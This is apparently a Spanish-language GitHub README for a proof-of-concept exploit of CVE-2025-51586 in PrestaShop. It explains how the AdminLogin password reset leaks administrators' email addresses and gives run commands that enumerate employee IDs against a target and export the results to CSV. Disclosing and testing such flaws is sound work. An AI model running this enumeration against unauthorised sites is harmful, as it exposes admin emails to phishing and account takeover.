
PrestaShop AdminLogin Email Enumeration PoC - CVE-2025-51586. This repository provides an ethical Proof-of-Concept (PoC) for the PrestaShop vulnerability allowing user enumeration through the AdminLogin password reset mechanism. It explains the impact, setup, and usage of the PoC script.
Este repositorio contiene una prueba de concepto (PoC) ética para la vulnerabilidad CVE-2025-51586, que afecta a PrestaShop versiones 1.7.x — 8.2.2.
La PoC enumera las direcciones de correo electrónico de los administradores mediante el mecanismo de restablecimiento de contraseña del Back Office (controlador AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee válido y un reset_token no válido<input name="reset_email" value="[email protected]">Aviso oficial: Friends of Presta Security
Reportado por Friends of Presta Security Team (aviso publicado el 4 de septiembre de 2025).
Esta PoC es solo para fines educativos y pruebas autorizadas. Úsala únicamente en sistemas que poseas o donde tengas permiso explícito. El autor y los colaboradores no son responsables del mal uso.
Clona el repositorio e instala las dependencias:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC desarrollada por 7h30th3r0n3. Vulnerabilidad descubierta por Friends of Presta Security Team.